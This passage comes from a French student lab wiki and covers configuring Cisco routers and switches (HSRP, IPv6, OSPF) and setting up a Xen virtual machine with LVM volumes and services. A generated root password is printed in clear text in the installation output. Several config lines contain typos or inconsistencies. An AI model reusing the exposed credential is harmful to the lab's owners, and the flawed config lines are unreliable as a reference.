   ip address 10.60.1.254 255.255.255.000           //Attribut l'addresse IPV4 pour le routeur ainsi que son mask&lt;br /&gt;
   standby version 2                                //Activation du HSRP (Host service Routing protocole) version 2 plus stable que la 1&lt;br /&gt;
   standby 3 ip 10.60.1.252                       //Donne l'addresse  IPV4 du routeur virtuelle pour le HSRP                             &lt;br /&gt;
   standby 3 preempt                              // Activation du HSRP         &lt;br /&gt;
   ipv6 address 2001:660:4401:60B2::/64 eui-64      //Attribut l'addresse IPV6                             &lt;br /&gt;
   ipv6 enable                                      //Active l'addressage IPV6                              &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B2::/64 1000 900  //Donner un préfixe IPV6 à chaque machine                              &lt;br /&gt;
   ipv6 nd router-preference high                    //IPV6 sera la route de préférence par défaut avec une forte probabilitée&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI3&lt;br /&gt;
   ip address 10.60.2.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 3 ip 10.60.2.252                                                     &lt;br /&gt;
   standby 3 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                       &lt;br /&gt;
   &lt;br /&gt;
   interface BDI4&lt;br /&gt;
   ip address 10.60.3.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 4 ip 10.60.3.252                                                     &lt;br /&gt;
   standby 4 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B4::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B4::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI5&lt;br /&gt;
   ip address 10.60.4.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 5 ip 10.60.4.252                                                    &lt;br /&gt;
   standby 5 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B5::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B5::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI6&lt;br /&gt;
   ip address 10.60.5.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.5.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B6::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B6::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit  &lt;br /&gt;
   &lt;br /&gt;
   interface BDI7&lt;br /&gt;
   ip address 10.60.6.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.6.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B7::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B7::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                                 &lt;br /&gt;
 &lt;br /&gt;
   interface BDI42&lt;br /&gt;
   ip address 193.48.57.173 255.255.255.240         &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 7 ip 193.48.57.172                                                     &lt;br /&gt;
   standby 7 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B1::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B1::/64 1000 900                               &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   int vlan 130&lt;br /&gt;
   ip address 192.168.222.1 255.255.255.248         &lt;br /&gt;
   ipv6 address fe80::2 link-local                  &lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 rip tpima2a5 enable                        &lt;br /&gt;
   exit&lt;br /&gt;
   ip rooting&lt;br /&gt;
   &lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E306 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.253   &lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary-address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.8 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexio&lt;br /&gt;
   &lt;br /&gt;
   conf t&lt;br /&gt;
    &lt;br /&gt;
   interface Vlan1&lt;br /&gt;
   ip address 10.60.0.253 255.255.255.0&lt;br /&gt;
   exit&lt;br /&gt;
    &lt;br /&gt;
   interface Vlan2&lt;br /&gt;
   ip address 10.60.1.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B2::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B2::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 2 ip 10.60.1.252&lt;br /&gt;
   standby 2 preempt&lt;br /&gt;
   exit&lt;br /&gt;
     &lt;br /&gt;
   interface Vlan3&lt;br /&gt;
   ip address 10.60.2.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 3 ip 10.60.2.252&lt;br /&gt;
   standby 3 preempt&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface Vlan4&lt;br /&gt;
   ip address 10.60.3.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B4::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B4::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 4 ip 10.60.3.252&lt;br /&gt;
   standby 4 preempt&lt;br /&gt;
   exit   &lt;br /&gt;
   &lt;br /&gt;
   interface Vlan5&lt;br /&gt;
   ip address 10.60.4.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B5::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B5::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 5 ip 10.60.4.252&lt;br /&gt;
   standby 5 preempt&lt;br /&gt;
   exit   &lt;br /&gt;
   &lt;br /&gt;
   interface Vlan6&lt;br /&gt;
   ip address 10.60.5.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B6::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B6::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.5.252&lt;br /&gt;
   standby 6 preempt&lt;br /&gt;
   exit   &lt;br /&gt;
   &lt;br /&gt;
   interface Vlan7&lt;br /&gt;
   ip address 10.60.6.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2201:660:4401:60B7::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2201:660:4401:60B7::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 7 ip 10.60.6.252&lt;br /&gt;
   standby 7 preempt&lt;br /&gt;
   exit   &lt;br /&gt;
   &lt;br /&gt;
   interface Vlan42&lt;br /&gt;
   ip address 193.48.57.174 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B1::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B1::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 42 ip 193.48.57.172&lt;br /&gt;
   standby 42 preempt&lt;br /&gt;
   exit&lt;br /&gt;
          &lt;br /&gt;
   interface Vlan130&lt;br /&gt;
   ip address 192.168.222.2 255.255.255.248&lt;br /&gt;
   ipv6 address FE80::42:3 link-local&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;/div&gt;</summary>
		<author><name>Pcoint</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51405</id>
		<title>TP sysres IMA2a5 2019/2020 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51405"/>
				<updated>2019-11-29T11:43:55Z</updated>
		
		<summary type="html">&lt;p&gt;Pcoint : /* Paquetages nécessaires pour le serveur DNS bind */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Fichier:Rex4ever.PNG|500px|right|frameless|© Copyright Ginette]]&lt;br /&gt;
== Accueil/Descriptif du groupe ==&lt;br /&gt;
Bienvenue sur la page du groupe 3. Le découpage en groupe par numéro permet de se repérer plus facilement dans l'adressage des différents réseaux nécessaire.Ce groupe est constitué de :&lt;br /&gt;
&lt;br /&gt;
*Pascal Coint&lt;br /&gt;
*Quentin Weisbecker&lt;br /&gt;
&lt;br /&gt;
Ce TP consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système nous avons à installer une machine virtuelle Xen avec l'OS Devian ainsi qu'implanter un auto-commutateur et un point d'accès. Nous effectuerons pas la suite des tests d'intrusion sur ces points d'accès afin de voir la vulnérabilité des différents protocoles de clé. Pour notre cas, nous nous étendrons sur les protocoles [https://fr.wikipedia.org/wiki/Wired_Equivalent_Privacy WEP] et [https://fr.wikipedia.org/wiki/Wi-Fi_Protected_Access WPA]-PSK.&lt;br /&gt;
&lt;br /&gt;
== Informations importantes == &lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 35%;margin: auto;&amp;quot;&lt;br /&gt;
! Description !! Détails&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|ID VLAN&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|4&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V4&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|10.60.3.0/24 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V6&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|2001:660:4401:60B3::/64&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Nom de l'ordinateur portable&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Requin&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Repérage à l'étiqueteuse&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|IMA2A5 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Numéro de poste&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Zabeth03&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== La machine Virtuelle sous XEN : ima2a5-rex4ever ==&lt;br /&gt;
=== Note importante ===&lt;br /&gt;
Comme indiqué dans le sujet, nous allons créer une machine virtuelle via l'utilitaire [https://wiki.xenproject.org/wiki/Xen_Project_4.11_Man_Pages Xen] Linux sur le '''dom0 cordouan.insecserv.deule.net''' via la commande '''ssh''' et le compte administrateur usuel.Sur notre machine virtuelle nous créerons par la suite un compte pifou et un compte root identique au Zabeth.&lt;br /&gt;
&lt;br /&gt;
=== Création de notre machine virtuelle XEN ===&lt;br /&gt;
Après s'être connecté, il faut maintenant creer la machine virtuelle :      &lt;br /&gt;
      xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
L'installation se lance alors :&lt;br /&gt;
&lt;br /&gt;
      root@cordouan:~# xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
      Use of uninitialized value within %DIST in pattern match (m//) at /usr/bin/xen-create-image line 1803.&lt;br /&gt;
      &lt;br /&gt;
      General Information&lt;br /&gt;
      --------------------&lt;br /&gt;
      Hostname       :  ima2a5-rex4ever&lt;br /&gt;
      Distribution   :  ascii&lt;br /&gt;
      Mirror         :  http://fr.deb.devuan.org/merged/&lt;br /&gt;
      Partitions     :  swap            512M  (swap)&lt;br /&gt;
                        /               4G    (ext4)&lt;br /&gt;
      Image type     :  sparse&lt;br /&gt;
      Memory size    :  256M&lt;br /&gt;
      Kernel path    :  /boot/vmlinuz-4.9.0-6-amd64&lt;br /&gt;
      Initrd path    :  /boot/initrd.img-4.9.0-6-amd64&lt;br /&gt;
      &lt;br /&gt;
      Networking Information&lt;br /&gt;
      ----------------------&lt;br /&gt;
      IP Address     : DHCP [MAC: xxxxxxx]&lt;br /&gt;
      &lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating swap on /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating ext4 filesystem on /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      Installation method: debootstrap&lt;br /&gt;
&lt;br /&gt;
L'installation peut sembler bloquer sur cette dernière ligne mais il est possible de voir ce qui se passe en arrière plan via un second terminal en SSH et la commande SSH&lt;br /&gt;
      tail -f /var/xen-tools/ima2a5-rex4ever.log&lt;br /&gt;
&lt;br /&gt;
A la fin de l'installation,on obtient le mot de passe root et des informations importantes :&lt;br /&gt;
      Installation Summary&lt;br /&gt;
      ---------------------&lt;br /&gt;
      Hostname        :  ima2a5-rex4ever&lt;br /&gt;
      Distribution    :  ascii&lt;br /&gt;
      MAC Address     :  xxxxxxxxxxx&lt;br /&gt;
      IP Address(es)  :  dynamic&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (DSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ECDSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ED25519)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (RSA)&lt;br /&gt;
      Root Password   :  sZzrYYPFZEwxsfmFghddGW5&lt;br /&gt;
&lt;br /&gt;
=== Ajout du bridge à ima2a5-rex4ever.cfg ===&lt;br /&gt;
Dans un premier lieu, on regarde l'existence du brige sur l'hote distant via : &lt;br /&gt;
      brctl show&lt;br /&gt;
Ce qui nous retourne : &lt;br /&gt;
      bridge name	bridge id		STP enabled	interfaces&lt;br /&gt;
      IMA2a5		8000.000af75e3dc0	no		eth1&lt;br /&gt;
      eth2&lt;br /&gt;
      if3.0&lt;br /&gt;
      IMA5sc		8000.000af75e3dc2	no		eth3&lt;br /&gt;
      eth5&lt;br /&gt;
      Insecure		8000.c81f66c22b83	no		vlan6&lt;br /&gt;
      L3MRIT		8000.000af763ae2d	no		eth4&lt;br /&gt;
      StudentsInfo		8000.c81f66c22b83	no		vlan50&lt;br /&gt;
On voit bien l'existence du bridge '''IMA2a5''', il faut donc l'ajouter à notre .cfg qui est le fichier de configuration de la VM ('''/etc/xen/ima2a5-rex4ever.cfg''')&lt;br /&gt;
et on modifie la ligne commençant par '''vif =''' et on ajoute le bridge de la manière suivante : &lt;br /&gt;
      vif = ['MAC:xxxxx,bridge = IMA2a5']&lt;br /&gt;
Après avoir modifié ce fichier, il faut le parser : xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
Une erreur '''NUMA placement failed, performance might be affected''' peut apparaître mais elle indique juste que xen n'arrive pas à disposer les VM comme il veut sur les procs, mais cela n'impactera que les performances nous passons outre ce problème.&lt;br /&gt;
&lt;br /&gt;
=== Démarrer la VM et accès console ===&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl console ima2a5-rex4ever&lt;br /&gt;
&lt;br /&gt;
il demande alors le login (root) et le mdp (longue chaine précédemment générée). Après nous être logué,on change le mot de passe qui devient le même que le mot de passe du root de '''corduan''' ou d'une zabeth.&lt;br /&gt;
&lt;br /&gt;
=== Montage des répertoires /var et /home ===&lt;br /&gt;
==== Creation des disques logique ====&lt;br /&gt;
Il faut d'abord créer les partitions logiques sur corduan via : &lt;br /&gt;
     root@cordouan:~#lvcreate -L10G -n ima2a5-rex4ever-home virtual&lt;br /&gt;
     root@cordouan:~#lvcreate -L10G -n ima2a5-rex4ever-var virtual&lt;br /&gt;
Il est possible qu'il affiche l'avertissement suivant : '''WARNING: ext2 signature detected on /dev/virtual/ima2a5-rex4ever-home at offset 1080. Wipe it? [y/n]'''&lt;br /&gt;
repondre alors oui(y).&lt;br /&gt;
Il est possible de verifier que votre partition a bien été crée via la commande :&lt;br /&gt;
      lvdisplay&lt;br /&gt;
On obtient alors dans la liste de toutes les partitions, nous deux partitions précedemment créées&lt;br /&gt;
      --- Logical volume ---&lt;br /&gt;
      LV Path                '''/dev/virtual/ima2a5-rex4ever-home'''&lt;br /&gt;
      LV Name                ima2a5-rex4ever-home&lt;br /&gt;
      VG Name                virtual&lt;br /&gt;
      LV UUID                mhJqFx-zO1m-PlOU-Zmeu-8NGx-7UUO-c2g9dP&lt;br /&gt;
      LV Write Access        read/write&lt;br /&gt;
      LV Creation host, time cordouan, 2019-11-08 08:47:26 +0000&lt;br /&gt;
      LV Status              available&lt;br /&gt;
      # open                 0&lt;br /&gt;
      LV Size                10.00 GiB&lt;br /&gt;
      Current LE             2560&lt;br /&gt;
      Segments               1&lt;br /&gt;
      Allocation             inherit&lt;br /&gt;
      Read ahead sectors     auto&lt;br /&gt;
      - currently set to     256&lt;br /&gt;
      Block device           254:3&lt;br /&gt;
     --- Logical volume ---&lt;br /&gt;
     LV Path                '''/dev/virtual/ima2a5-rex4ever-var'''&lt;br /&gt;
     LV Name                ima2a5-rex4ever-var&lt;br /&gt;
     VG Name                virtual&lt;br /&gt;
     LV UUID                9Bnl6S-6CE5-CtO2-hD8f-RidD-sps5-b1mrWg&lt;br /&gt;
     LV Write Access        read/write&lt;br /&gt;
     LV Creation host, time cordouan, 2019-11-08 08:50:57 +0000&lt;br /&gt;
     LV Status              available&lt;br /&gt;
     # open                 0&lt;br /&gt;
     LV Size                10.00 GiB&lt;br /&gt;
     Current LE             2560&lt;br /&gt;
     Segments               1&lt;br /&gt;
     Allocation             inherit&lt;br /&gt;
     Read ahead sectors     auto&lt;br /&gt;
     - currently set to     256&lt;br /&gt;
     Block device           254:4&lt;br /&gt;
Il faut maintenant faire pointer le système de fichier sur nos deux nouveaux repertoires pour finir la création : &lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-home&lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-var&lt;br /&gt;
Nos deux disques sont maintenant prêt, il ne reste plus qu'a les connecter avec la VM. Pour cela, il faut modifier le '''.cfg''' de nouveau.&lt;br /&gt;
&lt;br /&gt;
==== Modification du fichier de configuration ====&lt;br /&gt;
Retournons donc dans le fichier '''/etc/xen/ima2a5-rex4ever.cfg''' et dans la section disk modifier tel que : &lt;br /&gt;
&lt;br /&gt;
     disk    	= [&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/disk.img,xvda2,w',&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/swap.img,xvda1,w',               &lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-home,xvdb1,w',&lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-var,xvdb2,w',&lt;br /&gt;
                  ]&lt;br /&gt;
&lt;br /&gt;
Pour prendre effet il faut redémarrer la VM à l'aide des commandes&lt;br /&gt;
    xl shutdown ima2a5-rex4ever&lt;br /&gt;
    xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
&lt;br /&gt;
==== Configuration pour forcer le montage à chaque démarrage de la VM ====&lt;br /&gt;
Il faut ensuite aller dans la VM dans '''/etc/fstab''' et ajouter &lt;br /&gt;
    /dev/xvdb1		/home		ext4		defaults				0		2&lt;br /&gt;
    #/dev/xvdb2		/var		ext4		defaults				0		2&lt;br /&gt;
&lt;br /&gt;
Ces deux lignes permettent d'assurer que les 2 disques /var et /home soient pris en compte au démarrage de la VM.('''ATTENTION POUR LE MOMENT BIEN LAISSER # DEVANT LA 2eme LIGNE''')&lt;br /&gt;
Relancer la machine comme précédemment expliqué et testé que le /home fonctionne.&lt;br /&gt;
Pour le /var c'est un peu plus compliqué comme manipulation et il faut faire EXTREMENT attention , une fausse manipulation peut tuer la machine.&lt;br /&gt;
    mount /dev/xvdb2 /mnt&lt;br /&gt;
    rm -rf /mnt/lock&lt;br /&gt;
    rm -rf /mnt/log&lt;br /&gt;
    rm -rf /mnt/run&lt;br /&gt;
    mv /var/* /mnt&lt;br /&gt;
    vi /etc/fstab&lt;br /&gt;
Maintenant decommentez la deuxième ligne que vous aviez ajouté précedemment. Puis il faut lancer la commande :&lt;br /&gt;
    umount /mnt    &lt;br /&gt;
    mount -a&lt;br /&gt;
A l'aide de la commande '''fdisk -l''' depuis la VM, on peut verifier que nos quatres disques sont bien montés.De même avec '''df''' on obtient bien dans la liste les lignes : &lt;br /&gt;
      Filesystem		1K-blocks	Used	Available	Use%	Mounted on&lt;br /&gt;
     udev		75004		0 	75004		0%	/dev&lt;br /&gt;
     tmpfs          	23824		76 	23748		1%	/run&lt;br /&gt;
     /dev/xvda2   	4062912		459920	3376896		12%	/&lt;br /&gt;
     tmpfs           	5120		0  	5120		0%	/run/lock&lt;br /&gt;
     tmpfs         	152500  	0	152500		0%	/run/shm&lt;br /&gt;
     /dev/xvdb1  	10321208	23028   9773892		1%	/home&lt;br /&gt;
     /dev/xvdb2  	10321208	71076   9725844		1%	/var&lt;br /&gt;
La machine est donc prête, on peut passer à l'installation des paquetages linux nécessaires&lt;br /&gt;
=== Mise en place de l'adresse statique ===&lt;br /&gt;
Précedemment nous avions mis l'adresse en DHCP or il est demandé d'avoir une adresse statique (pour notre groupe il s'agit de  ''' 193.48.57.163/28 ''' )&lt;br /&gt;
&lt;br /&gt;
=== Paquetage Linux ===&lt;br /&gt;
Pour commencer, on va tout d'abord mettre le système à jour via : &lt;br /&gt;
    sudo apt-get update&lt;br /&gt;
==== Paquetages nécessaires pour le SSH ====&lt;br /&gt;
'''OpenSSH''' est un ensemble d'outils libres pour établir des communications chiffrées, donc sécurisées, sur un réseau informatique grâce au protocole '''SSH''' (Secure SHell).&lt;br /&gt;
Il chiffre tout le trafic (mots de passe y compris), via une combinaison astucieuse de chiffrement symétrique et asymétrique. '''OpenSSH''' fournit également d'autres méthodes d'authentification alternatives au traditionnel mot de passe.&lt;br /&gt;
Comme son nom l'indique, OpenSSH est développé dans le cadre du projet '''OpenBSD'''.&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Nom de la bibliothèque !! Descriptif !! Commande&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt-get install openssh-client&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt install openssh-server&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Dans notre cas, SSH est déjà présent sur la machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur Web Apache2 ====&lt;br /&gt;
Le logiciel libre Apache HTTP Server (Apache) est un serveur HTTP créé et maintenu au sein de la fondation Apache. C'est le serveur HTTP le plus populaire du World Wide Web. Il est distribué selon les termes de la licence Apache. &lt;br /&gt;
Pour l'installer, il faut taper la commande : &lt;br /&gt;
    apt install apache2&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur DNS/DNSSEC bind ====&lt;br /&gt;
Le service DNS (Domain Name System) est un service TCP/IP permettant la correspondance entre un nom de domaine qualifié (FQDN : Fully Qualified Domain Name) et une adresse IP. Ainsi, grâce à DNS, il n'est pas nécessaire de se souvenir des adresses IP.Un serveur qui héberge le service DNS est appelé &amp;quot;serveur de noms&amp;quot;. Ubuntu est livré par défaut avec BIND (Berkley Internet Naming Daemon), le serveur DNS le plus utilisé sur Internet. Pour installer bind9 :&lt;br /&gt;
    apt install bind9&lt;br /&gt;
&lt;br /&gt;
==== Mdadm : Gestionnaire de RAID Logiciel ====&lt;br /&gt;
Mdadm est une solution de RAID logiciel très fiable et très répandue dans la communauté Linux. Ce paquetage sera nécessaire pour la création d'un RAID5&lt;br /&gt;
   apt install mdadm&lt;br /&gt;
&lt;br /&gt;
== Le Site Web : HTTP ==&lt;br /&gt;
=== Achat d'un nom de domaine ===&lt;br /&gt;
Pour la réalisation de ce TP, nous avons dû acheter un nom de domaine via le site [https://www.gandi.net/fr Gandi.net] . On retiendra que notre nom de domaine est : [https://www.ima2a5-rex4ever.site rex4ever.site].&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage apache2 ===&lt;br /&gt;
